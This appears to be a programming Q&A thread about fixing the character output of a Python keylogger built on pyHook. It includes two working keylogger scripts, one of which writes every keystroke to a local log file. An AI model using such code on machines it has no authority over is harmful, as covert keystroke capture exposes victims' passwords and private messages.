# ASCII chr() not printing anything

Tags: python-3.x, ascii

I wrote a keylogger, but it isn't printing properly. If I tell it to print the event, ASCII decoded (`print(event.Ascii)`), it prints out the Ascii numerical value for that key. But if I tell it `print(chr(event.Ascii))` it just prints a blank row. Why is this and how do I fix it?

Full code:

```
import pyHook, pythoncom, sys, logging

file_log = "log.txt"

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG,format='%(message)s')
    chr(event.Ascii)
    logging.log(10, chr(event.Ascii))
    print(chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

Comment: Try `print(chr(int(event.Ascii)))`.

Comment: That adds some progress. I tested by using the Enter key, Space bar and A key, and they all returned a little box that looks like a smaller version of this: []

Comment: Try `print(chr(int(str(event.Ascii))))`. I should have suggested that before.

Comment: Now it prints blank lines.

Answer (score 0):

This worked for me:

```
import pyHook
import pythoncom
import time

log = open('log.txt', 'w')
result = ''
def OnKeyboardEvent(event):
    global result
    if event.Ascii != 13:
        result += chr(event.Ascii)
    else:
        log.write("%s\r\n" % result)
        log.flush()
        result = ''
    return True

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
try:
    while True:
        pythoncom.PumpWaitingMessages()
        time.sleep(0.01)
except KeyboardInterrupt:
    print "Keyboard interrupt"
```

It wrote lines of text to the log file. It has the added advantage that it can be stopped by `Ctrl+C`. I am not sure why your code is not working. However, you might try the `example.py` script that comes with `pyHook`.

NOTE: Normally, I would go well out of my way to avoid using a global variable, but this made the code shorter.

Comment: This didn't print anything for me. . . perhaps it is because I was using a key-logger tutorial for Python 2.x, but I run Python 3.x?

Comment: Which version of Python 3 are you using? Did you install the version of pyHook that matches your Python version? I had to install the 2.7 version of pyHook to get it to work with Python 2.7.

Comment: I`m using python 3.5.2 and I have pyHook 1.5.1 i believe. . . the correct version for ython 3.5.2

Comment: What was the download link you used? I used [pyHook for Python 2.7](http://www.lfd.uci.edu/~gohlke/pythonlibs/zpcorkgj/pyHook-1.5.1-cp27-none-win32.whl).

Comment: So you downloaded one of the cp35 versions? What version of Windows are you using?

Comment: Windows 10. I downloaded the one that said 1.5.1

Comment: Assuming you are running 64-bit windows, you would want to download the file with this name: [pyHook-1.5.1-cp35-none-win_amd64.whl](http://www.lfd.uci.edu/~gohlke/pythonlibs/zpcorkgj/pyHook-1.5.1-cp35-none-win_amd64.whl). That is the 64-bit version for CPython 3.5 (cp35).